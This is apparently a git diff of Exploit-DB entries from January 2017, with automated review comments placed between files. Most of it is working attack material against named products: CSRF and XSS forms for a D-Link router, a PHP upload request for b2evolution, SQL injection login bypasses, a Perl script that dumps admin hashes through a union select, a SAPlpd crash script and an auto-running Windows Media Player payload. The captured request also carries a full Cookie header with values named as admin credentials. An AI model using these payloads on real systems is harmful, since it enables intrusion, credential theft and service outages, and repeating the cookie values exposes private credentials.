41037,platforms/php/webapps/41037.txt,"ECommerce-TIBSECART - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
|
||||
41038,platforms/php/webapps/41038.txt,"ECommerce-Multi-Vendor Software - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
|
||||
|
|
|
83
platforms/hardware/webapps/41033.txt
Executable file
|
@ -0,0 +1,83 @@
|
|||
# Title: D-Link DIR-615 Multiple Vulnerabilities
|
||||
# Date: 10-01-2017
|
||||
# Hardware Version: E3
|
||||
# Firmware Version: 5.10
|
||||
# Tested on: Windows 8 64-bit
|
||||
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
|
||||
# Original write-up:https://osandamalith.com/2017/01/04/d-link-dir-615-open-redirection-and-xss/
|
||||
|
||||
Overview
|
||||
--------
|
||||
|
||||
The 'apply.cgi' file was vulnerable to Open Redirection and XSS. Inside the router many other cgi files too use this functionality in 'apply.cgi'. For example the 'ping_response.cgi' file.
|
||||
|
||||
Open Redirection
|
||||
-----------------
|
||||
# apply.cgi
|
||||
|
||||
<html>
|
||||
<!-- @OsandaMalith -->
|
||||
<body>
|
||||
<form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
|
||||
<input type="hidden" name="html_response_page" value="https://google.lk" />
|
||||
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
|
||||
<img src=x onerror="exploit.submit()"/>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
# ping_response.cgi
|
||||
|
||||
<html>
|
||||
<!-- @OsandaMalith -->
|
||||
<body>
|
||||
<form action="http://192.168.0.1/ping_response.cgi" method="POST" id="exploit">
|
||||
<input type="hidden" name="html_response_page" value="https://google.lk" />
|
||||
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
|
||||
<input type="hidden" name="ping_ipaddr" value="192.168.0.101" />
|
||||
<input type="hidden" name="ping" value="Ping" />
|
||||
<img src=x onerror="exploit.submit()"/>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
POST XSS
|
||||
---------
|
||||
|
||||
# apply.cgi
|
||||
|
||||
<html>
|
||||
<!-- @OsandaMalith -->
|
||||
<body>
|
||||
<form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
|
||||
<input type="hidden" name="html_response_page" value="javascript:confirm(/@OsandaMalith/)" />
|
||||
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
|
||||
<img src=x onerror="exploit.submit()"/>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
# ping_response.cgi
|
||||
|
||||
<html>
|
||||
<!-- @OsandaMalith -->
|
||||
<body>
|
||||
<form action="http://192.168.0.1/ping_response.cgi" method="POST" id="exploit">
|
||||
<input type="hidden" name="html_response_page" value="javascript:confirm(/@OsandaMalith/)" />
|
||||
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
|
||||
<input type="hidden" name="ping_ipaddr" value="127.0.0.1" />
|
||||
<input type="hidden" name="ping" value="Ping" />
|
||||
<img src=x onerror="exploit.submit()"/>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
Disclosure Timeline
|
||||
--------------------
|
||||
|
||||
12/19/16: Reported to D-Link
|
||||
12/21/16: Security Patch released
|
||||
ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-615/REVT/DIR-615_REVT_RELEASE_NOTES_20.12PTb01.pdf
|
|
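Review bot: The header gives "Hardware Version: E3" and "Firmware Version: 5.10", but the only fix reference in the Disclosure Timeline is a release-notes link for REVT firmware 20.12PTb01, so the file never states which firmware fixes the tested revision. Add a line naming the fixed version per hardware revision, or say that it is unknown, so that owners of an E3 unit can tell whether the patch applies to them. The dates are also written in two formats ("10-01-2017" in the header, "12/19/16" in the timeline). A single unambiguous format such as 2017-01-10 would remove the day/month guesswork. It would also help defenders to state in the Overview that both sections rely on the same html_response_page parameter, since that is the value a fix or filter has to restrict to local page names.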
@ -1,8 +1,6 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Source: http://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
|
||||
#
|
||||
# Nginx (Debian-based distros) - Root Privilege Escalation PoC Exploit
|
||||
# Nginx (Debian-based distros + Gentoo) - Root Privilege Escalation PoC Exploit
|
||||
# nginxed-root.sh (ver. 1.0)
|
||||
#
|
||||
# CVE-2016-1247
|
||||
|
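Review bot: The hunk header goes from 8 lines to 6, so two lines besides the old title are removed from the top of the script. If the "# Source:" line pointing at the legalhackers.com advisory is one of them, keep it. It is the only reference in the visible header to the upstream write-up for CVE-2016-1247, and readers need it to find the affected package versions and the fix.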
@ -18,8 +16,8 @@
|
|||
#
|
||||
# ---
|
||||
# This PoC exploit allows local attackers on Debian-based systems (Debian, Ubuntu
|
||||
# etc.) to escalate their privileges from nginx web server user (www-data) to root
|
||||
# through unsafe error log handling.
|
||||
# as well as Gentoo etc.) to escalate their privileges from nginx web server user
|
||||
# (www-data) to root through unsafe error log handling.
|
||||
#
|
||||
# The exploit waits for Nginx server to be restarted or receive a USR1 signal.
|
||||
# On Debian-based systems the USR1 signal is sent by logrotate (/etc/logrotate.d/nginx)
|
||||
|
|
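Review bot: After this change the sentence reads "on Debian-based systems (Debian, Ubuntu as well as Gentoo etc.)", which places Gentoo inside the list of Debian-based systems. Reword it so Gentoo is named separately, for example "on Debian-based systems (Debian, Ubuntu etc.) as well as Gentoo". The unchanged lines that follow still describe only the Debian case ("On Debian-based systems the USR1 signal is sent by logrotate"), and "(www-data)" is given as the web server user without saying whether that holds on Gentoo. Either extend those lines or state that the details are Debian-specific.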
125
platforms/php/webapps/41011.txt
Executable file
|
@ -0,0 +1,125 @@
|
|||
# Exploit Title: b2evolution6.8.2stable – Upload
|
||||
# Date: 29/12/2016
|
||||
# Exploit Author: Li Fei
|
||||
# Vendor Homepage: http://b2evolution.net/
|
||||
# Software Link: http://b2evolution.net/downloads/6-8-2-stable?download=6407
|
||||
# Version: 6.8.2
|
||||
# Tested on: win7 64bit
|
||||
|
||||
No need admin access for upload files and we can upload any file without bypass(.php,.exe,....)
|
||||
|
||||
1-goto http://localhost/b2evolution/index.php/a/extended-post
|
||||
|
||||
2- click on Browse botton and select you`re file
|
||||
|
||||
3- click on upload
|
||||
|
||||
Ceshi.php path is:
|
||||
|
||||
http://SiteName/ceshi.php
|
||||
|
||||
poc url:
|
||||
|
||||
POST /b2evolution/htsrv/comment_post.php HTTP/1.1
|
||||
|
||||
Poc header:
|
||||
|
||||
Host: localhost
|
||||
|
||||
Content-Length: 1054
|
||||
|
||||
Cache-Control: max-age=0
|
||||
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
|
||||
Origin: http://localhost
|
||||
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
|
||||
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZ4hUYCjABZB7YSL
|
||||
|
||||
Referer: http://localhost/b2evolution/index.php/a/extended-post
|
||||
|
||||
Accept-Encoding: gzip, deflate
|
||||
|
||||
Accept-Language: zh-CN,zh;q=0.8
|
||||
|
||||
Cookie: session_b2evo=8323_COaAvLi6oU0LKIlMsoa207tOu4MRliDS; iCMS_USER_AUTH=93f92757UuFn7JIQa3nI%252Bk%252FF0s5elmm8KsIgZm%252F357CeOEhJUy7AsnKbPiZUa2eJTzmQx9lPUSaQcNVQtRiWJd%252BCBX0BQ4UpjoiTRBtkGujEc8rTtKoz3IGSFexrQEnmFfxKiL%252B1KR4nGq9wA88zDfJw6c1D7w7xeiYht2Iwo72Fcv8s6JjLcedy52QCOTHRPAFQ%252BdKcClUZz4vjvIvfZi5j6V4xQ1jpbnvV%252FMH6uyw7%252BL4Q41xqDKfgf1j7Sl36%252FGiXHwnij92A6nAMnxG78ZkUg5WG9PY5AtTyEMEtrHAuip7iPJbItdeuTSiTqwoIff%252BLuU4FM9nEldOYY2Jm9UD6XdgaXuyZBHhvb1v0buICmdQPX6rfrki9lZA; iCMS_userid=faf9c76a%252FQiEcyDoXBxmLMRDumokuULwqflVA%252FnfKJbcmsqFgw; iCMS_nickname=a693e7b1f4QEBL83uf0qmVI9BhIOCYq%252FTxa7NPwX8xobJpNm8bA; a8850_times=1; CNZZDATA80862620=cnzz_eid%3D1580835190-1482064117-http%253A%252F%252Flocalhost%252F%26ntime%3D1482064117; iweb_captcha=a95d2426cce76ef614NzA5ODI0NDUwOT5uZjFmY2RibDw4NGMyZjYxYzdmY2Bsa2ppdA; iweb_admin_role_name=6f99d0f079b6898180NDA1OTgwODg2NTk2PWA0Y2IwNGY9YWJgYWI3PmpgO2TrtofivafjrqbnmIXtkZg; iweb_admin_id=bef908b03b94700ce0ODA1MDEwMDAwMGowOTZlNzUwMTg2MDMxMmA3MWIxMzYx; iweb_admin_name=bef908b03b94700ce0ODA1MDEwMDAwMD8xbmUzMWFlOThiOzI3YjVmOjFgMjlhbWxpZg; iweb_admin_pwd=52f2f828c001b132f5NzAwMDc1NDcwMTg9YTE3NW8xYzA0M2E1YDdlYmY9YTllMjBnYmAyOjI5amEyOWNkYGU3NmUwNTdmNDVjPTA1ZQ
|
||||
|
||||
Connection: close
|
||||
|
||||
|
||||
|
||||
------WebKitFormBoundarytZ4hUYCjABZB7YSL
|
||||
|
||||
Content-Disposition: form-data; name="comment_rating"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
------WebKitFormBoundarytZ4hUYCjABZB7YSL
|
||||
|
||||
Content-Disposition: form-data; name="g"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
------WebKitFormBoundarytZ4hUYCjABZB7YSL
|
||||
|
||||
Content-Disposition: form-data; name="uploadfile[]"; filename="ceshi.php"
|
||||
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
|
||||
|
||||
<?php
|
||||
|
||||
eval("echo'hello world';");
|
||||
|
||||
?>
|
||||
|
||||
------WebKitFormBoundarytZ4hUYCjABZB7YSL
|
||||
|
||||
Content-Disposition: form-data; name="submit_comment_post_19[save]"
|
||||
|
||||
|
||||
|
||||
Send comment
|
||||
|
||||
------WebKitFormBoundarytZ4hUYCjABZB7YSL
|
||||
|
||||
Content-Disposition: form-data; name="crumb_comment"
|
||||
|
||||
|
||||
|
||||
dXuthsKjMjhG2dnhADtzzOW414qV6Qky
|
||||
|
||||
------WebKitFormBoundarytZ4hUYCjABZB7YSL
|
||||
|
||||
Content-Disposition: form-data; name="comment_type"
|
||||
|
||||
|
||||
|
||||
comment
|
||||
|
||||
------WebKitFormBoundarytZ4hUYCjABZB7YSL
|
||||
|
||||
Content-Disposition: form-data; name="comment_item_ID"
|
||||
|
||||
|
||||
|
||||
19
|
||||
|
||||
------WebKitFormBoundarytZ4hUYCjABZB7YSL
|
||||
|
||||
Content-Disposition: form-data; name="redirect_to"
|
||||
|
||||
|
||||
|
||||
http://localhost/b2evolution/index.php/a/extended-post
|
||||
|
||||
------WebKitFormBoundarytZ4hUYCjABZB7YSL—
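Review bot: the captured request keeps the reporter's full Cookie header, including values named iCMS_USER_AUTH, iweb_admin_name and iweb_admin_pwd that appear unrelated to b2evolution, and none of them is needed to document the upload. Trim the header to the b2evolution cookie with a placeholder value. The request also carries session_b2evo and a crumb_comment token, so the write-up should say what account level that session had, because the text claims "No need admin access" without showing it. The closing boundary ends in a dash character instead of "--", so the body as recorded is not well-formed multipart.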
|
16
platforms/php/webapps/41028.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
# Vulnerability: Job Portal Script v9.11 Authentication bypass
|
||||
# Date: 12.01.2017
|
||||
# Software link: http://itechscripts.com/job-portal-script/
|
||||
# Demo: http://job-portal.itechscripts.com
|
||||
# Price: 199$
|
||||
# Category: webapps
|
||||
# Exploit Author: Dawid Morawski
|
||||
# Website: http://www.morawskiweb.pl
|
||||
# Contact: dawid.morawski1990@gmail.com
|
||||
#######################################
|
||||
|
||||
|
||||
Go to http://localhost/[PATH]/admin/index.php and set:
|
||||
|
||||
Username: admin
|
||||
Password: ' or '1'='1
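Review bot: the entry stops at the login values and has no "Tested on" line, so a reader cannot tell whether v9.11 was verified on a local install or only against the site listed under "Demo:". Add the test environment and one sentence naming the cause behind the "Authentication bypass" in the title, which is what a maintainer needs to locate and fix the login query.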
|
16
platforms/php/webapps/41029.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
# Vulnerability: Online Food Delivery v2.04 Authentication bypass
|
||||
# Date: 12.01.2017
|
||||
# Software link: http://itechscripts.com/food-delivery/
|
||||
# Demo: http://restaurant.itechscripts.com
|
||||
# Price: 49$
|
||||
# Category: webapps
|
||||
# Exploit Author: Dawid Morawski
|
||||
# Website: http://www.morawskiweb.pl
|
||||
# Contact: dawid.morawski1990@gmail.com
|
||||
#######################################
|
||||
|
||||
|
||||
Go to http://localhost/[PATH]/admin/admin_login.php and set:
|
||||
|
||||
Username: 1' or 1=1 -- -
|
||||
Password: anything
|
39
platforms/php/webapps/41032.pl
Executable file
|
@ -0,0 +1,39 @@
|
|||
#!/usr/bin/perl -w
|
||||
|
||||
# iTechscripts Freelancer Script v5.11 (sk) SQL Injection Vulnerability
|
||||
# Author : v3n0m
|
||||
# Contact : v3n0m[at]outlook[dot]com
|
||||
# Date : January, 11-2017 GMT +7:00 Jakarta, Indonesia
|
||||
# Software : Freelancer Script
|
||||
# Version : 5.11 Lower versions may also be affected
|
||||
# Price : US$199.00
|
||||
# Link : http://itechscripts.com/freelancer-script/
|
||||
# Greetz : YOGYACARDERLINK, CAFE BMW, Dhea Fathin Karima & YOU !!
|
||||
sub clear{
|
||||
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
|
||||
}
|
||||
clear();
|
||||
print "|----------------------------------------------------|\n";
|
||||
print "| iTechscripts Freelancer Script 5.11 SQLi Exploiter |\n";
|
||||
print "| Coded by : v3n0m |\n";
|
||||
print "| Greetz : YOGYACARDERLINK |\n";
|
||||
print "|----------------------------------------------------|\n";
|
||||
use LWP::UserAgent;
|
||||
print "\nInsert Target:[http://wwww.target.com/path/]: ";
|
||||
chomp(my $target=<STDIN>);
|
||||
print "\n[!] Exploiting Progress...\n";
|
||||
print "\n";
|
||||
$concat="group_concat(username,char(58),password)";
|
||||
$table="admin_user";
|
||||
$dheakarima = LWP::UserAgent->new() or die "Could not initalize browser\n";
|
||||
$dheakarima->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
|
||||
$host = $target . "category.php?sk=-9999+union+all+select+null,null,".$concat.",null+from/**/".$table."+--+";
|
||||
$xf2r = $dheakarima->request(HTTP::Request->new(GET=>$host));
|
||||
$answer = $xf2r->content;
|
||||
if ($answer =~/([0-9a-fA-F]{32})/) {
|
||||
print "\n[+] Admin Password : $1\n";
|
||||
print "[+] Success !! Check target for details...\n";
|
||||
print "\n";
|
||||
}
|
||||
else{print "\n[-] Failed\n";
|
||||
}
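Review bot: the affected file and parameter appear only inside the $host assignment (category.php, sk); the header comments give the product, version and price but not the injection point. Add header lines for the vulnerable file and parameter and a "Tested on" entry so the record can be triaged without reading the code. The output line "[+] Admin Password : $1" prints whatever 32-hex-character run the regex finds, so it should be labelled as a hash, not a password.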
|
17
platforms/php/webapps/41034.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Vulnerability: School Management Software v2.75 - SQL Injection Web Vulnerability
|
||||
# Google Dork: School Management Software
|
||||
# Date:11.01.2017
|
||||
# Vendor Homepage: http://itechscripts.com/school-management-software/
|
||||
# Script Name: School Management Software
|
||||
# Script Version: v2.75
|
||||
# Script Buy Now: http://itechscripts.com/school-management-software/
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
#
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]//notice-edit.php?aid=[SQL]
|
||||
# E.t.c.... Other files, too. There are security vulnerabilities.
|
||||
# # # # #
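Review bot: "E.t.c.... Other files, too. There are security vulnerabilities." cannot be verified or acted on; only notice-edit.php and its aid parameter are named. List the other affected files and parameters or drop the sentence, and remove the doubled slash in "[PATH]//notice-edit.php".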
|
16
platforms/php/webapps/41035.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
# # # # #
|
||||
# Vulnerability:(Profile) Arbitrary Shell Upload
|
||||
# Google Dork: Airbnb Clone Script
|
||||
# Date:11.01.2017
|
||||
# Vendor Homepage: http://www.tibsolutions.com/airbnb-clone/
|
||||
# Script Name: Airbnb Clone Script
|
||||
# Script Buy Now: http://www.hotscripts.com/listing/airbnb-clone-tibsolutions/
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
#Exploit :
|
||||
#Register in site ... and login
|
||||
#Goto profil
|
||||
#Empty file .htaccess and Shell.php...
|
||||
#
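Review bot: the steps end at "#Empty file .htaccess and Shell.php..." without saying which profile field accepts the upload or which version was tested, and the "Vulnerability:" line omits the product name that the "Script Name" field carries. Put the product name in the title line and add version and "Tested on" fields so the entry can be matched to an installation.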
|
15
platforms/php/webapps/41036.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
# # # # #
|
||||
# Vulnerability:(Profile) Arbitrary Shell Upload
|
||||
# Google Dork: Penny Auction Script
|
||||
# Date:11.01.2017
|
||||
# Vendor Homepage: http://www.tibsolutions.com/tibs-eauction/
|
||||
# Script Name: Penny Auction Script
|
||||
# Script Buy Now: http://www.hotscripts.com/listing/penny-auction-software-156843/
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
#Exploit :
|
||||
#Register in site ... and login
|
||||
#Goto profil
|
||||
#Empty file .htaccess and Shell.php...
|
15
platforms/php/webapps/41037.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
# # # # #
|
||||
# Vulnerability:(Profile) Arbitrary Shell Upload
|
||||
# Google Dork: ECommerce-TIBSECART
|
||||
# Date:11.01.2017
|
||||
# Vendor Homepage: http://www.tibsolutions.com/tibs-ecart/
|
||||
# Script Name: ECommerce-TIBSECART
|
||||
# Script Buy Now: http://www.tibsolutions.com/tibs-ecart/
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
#Exploit :
|
||||
#Register in site ... and login
|
||||
#Goto profil
|
||||
#Empty file .htaccess and Shell.php...
|
15
platforms/php/webapps/41038.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
# # # # #
|
||||
# Vulnerability:(Profile) Arbitrary Shell Upload
|
||||
# Google Dork: ECommerce-Multi-Vendor Software
|
||||
# Date:11.01.2017
|
||||
# Vendor Homepage: http://www.tibsolutions.com/multi-vendor/
|
||||
# Script Name: ECommerce-Multi-Vendor Software
|
||||
# Script Buy Now: http://www.tibsolutions.com/multi-vendor/
|
||||
# Author: İhsan Şencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
#Exploit :
|
||||
#Register in site ... and login
|
||||
#Goto profil
|
||||
#Empty file .htaccess and Shell.php...
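Review bot: this is the fourth entry in the commit (41035 to 41038) whose exploit steps are word for word the same, differing only in the "Google Dork", "Script Name" and vendor URL lines, and none carries a version number. Either record them as one advisory covering the four tibsolutions products or add per-product version and test details so each entry stands on its own.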
|
|
@ -298,7 +298,7 @@ function find_username ()
|
|||
global $url, $fid, $adminid;
|
||||
|
||||
$req = "name=PNphpBB2&file=viewforum&f=".$fid;
|
||||
$str = "file=profile&mode=viewprofile&u=".$adminid;
|
||||
$str = "file=profile&mode=viewprofile&u=".$adminid;
|
||||
|
||||
$html = Send($url, $req);
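Review bot: the two $str = "file=profile&mode=viewprofile&u=".$adminid; lines are identical as rendered, so the single changed line in this hunk looks like a whitespace or line-ending edit. Confirm that is intended and say so in the commit message, since nothing else in find_username() changes here.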
|
||||
|
||||
|
|
24
platforms/windows/dos/41030.py
Executable file
|
@ -0,0 +1,24 @@
|
|||
# Exploit Title: SAPlpd 7.40 Denial of Service
|
||||
# Date: 2016-12-28
|
||||
# Exploit Author: Peter Baris
|
||||
# Exploit code: http://saptech-erp.com.au/resources/saplpd_dos.zip
|
||||
# Version: 7.40 all patch levels (as a part of SAPGui 7.40)
|
||||
# Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64
|
||||
|
||||
|
||||
import socket
|
||||
|
||||
# Opcodes 03h and 04h are vulnerable to bad characters 00h and 0ah
|
||||
# So you can modify the DoS accordingly
|
||||
# The added 800 A's are just to show, that you can deliver a complete shell with the command
|
||||
|
||||
DoS = ("\x03"+"\x0a"+"\x41"*800)
|
||||
|
||||
|
||||
s = socket.socket()
|
||||
s.settimeout(1)
|
||||
s.connect(('192.168.198.132', 515))
|
||||
print("[*] Crashing SAPlpd 7.40")
|
||||
print("[*] Payload length: "+str(len(DoS))+" bytes")
|
||||
s.send(DoS)
|
||||
s.close()
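Review bot: the header comments never state which service port is affected; it is visible only in s.connect(('192.168.198.132', 515)). Add a header line naming TCP 515 and the vendor fix status so readers can scope exposure without reading the code. The comment "you can deliver a complete shell with the command" also claims more than an entry titled "Denial of Service" demonstrates; either support it or reword it.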
|
15
platforms/windows/local/41031.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
# Exploit Title: aSc Timetables 2017 input field buffer overflow and code execution
|
||||
# Date: 2017-01-12
|
||||
# Exploit Author: Peter Baris
|
||||
# Exploit code: http://saptech-erp.com.au/resources/Timetables.zip
|
||||
# Exploit documentation: http://saptech-erp.com.au/resources/TimeTables_2017.pdf
|
||||
# Software Link: http://www.asctimetables.com/download/aScTimeTables.exe
|
||||
# Version: 1.0.0.1
|
||||
# Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64, Windows Server 2012 R2 x64, Windows Server 2016 x64
|
||||
|
||||
POC:
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41031.zip
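Review bot: the body under "POC:" is only a link to 41031.zip, and the header points to two more external files, so the entry itself never says which input field overflows or how the "code execution" in the title was confirmed. Add a short description of the affected field and the observed crash to the text, and reconcile "Version: 1.0.0.1" with the "2017" in the title.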
|
||||
|
||||
|
||||
|
188
platforms/windows/remote/20424.txt
Executable file
|
@ -0,0 +1,188 @@
|
|||
----[Title:
|
||||
|
||||
[ GFISEC23112000 ] Microsoft Media Player 7 allows executation of
|
||||
Arbitrary Code
|
||||
|
||||
|
||||
|
||||
|
||||
----[Published:
|
||||
|
||||
23.NOV.2000
|
||||
|
||||
|
||||
----[Vendor Status:
|
||||
|
||||
Microsoft has been informed and we have worked with them to release
|
||||
a patch.
|
||||
|
||||
|
||||
|
||||
----[Systems Affected:
|
||||
|
||||
|
||||
Windows ME (WMP7 is installed by default)
|
||||
and 95,98 NT and 2000, using:
|
||||
|
||||
* Windows Media Player 7
|
||||
|
||||
and
|
||||
|
||||
* Internet Explorer 3+,
|
||||
|
||||
* Outlook Express 2000,
|
||||
|
||||
* Outlook Express 98,
|
||||
|
||||
* Outlook 2000,
|
||||
|
||||
* Outlook 98
|
||||
|
||||
* possibly all other HTML and/or
|
||||
javascript enabled e-mail clients.
|
||||
|
||||
|
||||
|
||||
----[The problem:
|
||||
|
||||
|
||||
GFI, developer of email content checking & network
|
||||
security software, has recently discovered a security flaw
|
||||
within Windows Media Player which allows a malicious user
|
||||
to run arbitary code on a target machine as it attempts to
|
||||
view a website or an HTML E-mail.
|
||||
|
||||
|
||||
The problem is exploited by embedding a javascript (.js) file within a
|
||||
Media Player skin file (.wmz) which can also be embeded in a Windows Media
|
||||
Download file (.wmd). This does not require the user to run any attachments
|
||||
since the Media Player file is automatically executed using a iframe tag
|
||||
or a window.open() with in a <script> tag.
|
||||
|
||||
|
||||
|
||||
----[Proof of concept Exploit:
|
||||
|
||||
<Embedded within an HTML file or e-mail>
|
||||
|
||||
E-mail Example 1.
|
||||
|
||||
<head>
|
||||
<script language="JavaScript">
|
||||
<!--
|
||||
function MM_openBrWindow(theURL,winName,features) { //v2.0
|
||||
alert('This exploit will now open a new window\n
|
||||
and automatically download the wmd file\n
|
||||
and execute it. This will create a file named\n
|
||||
gfiseclab.txt in your C:\\');
|
||||
window.open(theURL,winName,features);
|
||||
}
|
||||
//-->
|
||||
</script>
|
||||
</head>
|
||||
|
||||
<body bgcolor="#FFFFFF"
|
||||
|
||||
onLoad="MM_openBrWindow('http://website/test.wmd','','width=0,height=0')">
|
||||
</Embedded within an HTML e-mail>
|
||||
|
||||
|
||||
|
||||
E-mail Example 2.
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<script>
|
||||
alert('This exploit will now open a new window \n and automatically download
|
||||
the wmd file \n
|
||||
|
||||
and execute it. This will create a file named \n gfiseclab.txt in your
|
||||
C:\\')</script>
|
||||
<iframe src="http://website/test.wmd";></iframe></body>
|
||||
</html>
|
||||
|
||||
-------------------------------------
|
||||
|
||||
|
||||
|
||||
test.wmd is a compressed zip file which contains the following files:
|
||||
|
||||
* test.asx: meta file which points to an mpg file and
|
||||
the exploit skin file
|
||||
|
||||
* test.mpg: an example mpeg movie.
|
||||
|
||||
* test.wmz: the exploit skin file.
|
||||
|
||||
|
||||
|
||||
test.wmz is also a compressed zip file containing:
|
||||
|
||||
* test.js: our javascript which contains the following code
|
||||
************************************
|
||||
var fso, f1;
|
||||
fso = new ActiveXObject("Scripting.FileSystemObject");
|
||||
f1 = fso.CreateTextFile("C:\\gfiseclab.txt", true);
|
||||
|
||||
function onload(){
|
||||
playAgain();
|
||||
}
|
||||
************************************
|
||||
|
||||
* test.wms: another metafile which calls test.js
|
||||
|
||||
-------------------------------------
|
||||
|
||||
|
||||
----[Solution:
|
||||
|
||||
For e-mail the best solution is to apply filtering on incoming e-mails via
|
||||
the SMTP server to filter WMD and WMZ files, disable javascript iframe tags,
|
||||
|
||||
meta refresh tags and possibly ActiveX tags. This means that users should
|
||||
not worry about receiving malicious email and spreading worms etc.
|
||||
|
||||
|
||||
Consider unregistering .wmd and .wmz so from being associated with Media
|
||||
Player 7 until a vendor patch is applied. Procedure:
|
||||
|
||||
In Windows Explorer click on View>Options>File Types and delete the
|
||||
following entries:
|
||||
|
||||
|
||||
* Windows Media Player Skin Package.
|
||||
|
||||
* Windows Media Player Download Package.
|
||||
|
||||
|
||||
|
||||
This should provide some better protection.
|
||||
|
||||
|
||||
|
||||
----[Reference:
|
||||
|
||||
http://www.gfi.com/press/memp7exploitpr.htm
|
||||
http://www.microsoft.com/technet/security/bulletin/MS00-090.asp
|
||||
|
||||
|
||||
|
||||
----[Contact Information:
|
||||
|
||||
Sandro Gauci
|
||||
GFI Security Lab
|
||||
sandro@xxxxxxx
|
||||
http://www.gfi.com
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
source: http://www.securityfocus.com/bid/1976/info
|
||||
|
||||
Windows Media Player is an application used for digital audio, and video content viewing.
|
||||
|
||||
It is possible for a user running Windows Media Player 7 to enable a skin (.wms) file and unknowingly execute an embedded malicious script. When a user attempts to retrieve a skin (.wms) file it is downloaded and resides on the user's local machine. If Windows Media Player is run with the malicious skin enabled, the Active X component would allow any arbitrary action to be achieved. Depending on internet security settings this vulnerability is also exploitable if the skin file in question resides on a web site. The script could automatically launch when a user visits the web site.
|
||||
|
||||
Execution of arbitrary scripts could make it possible for the malicious host to gain rights equivalent to those of the current user.
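Review bot: the two texts joined in this file use the extensions differently: the GFI advisory calls test.wmz "the exploit skin file" and test.wms "another metafile which calls test.js", while the SecurityFocus summary at the end speaks of "a skin (.wms) file". Add a line stating which extension is the skin package and which is the file inside it, since the mail-filtering advice under "Solution" names only WMD and WMZ. The second sample also has a stray semicolon in <iframe src="http://website/test.wmd";>.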
|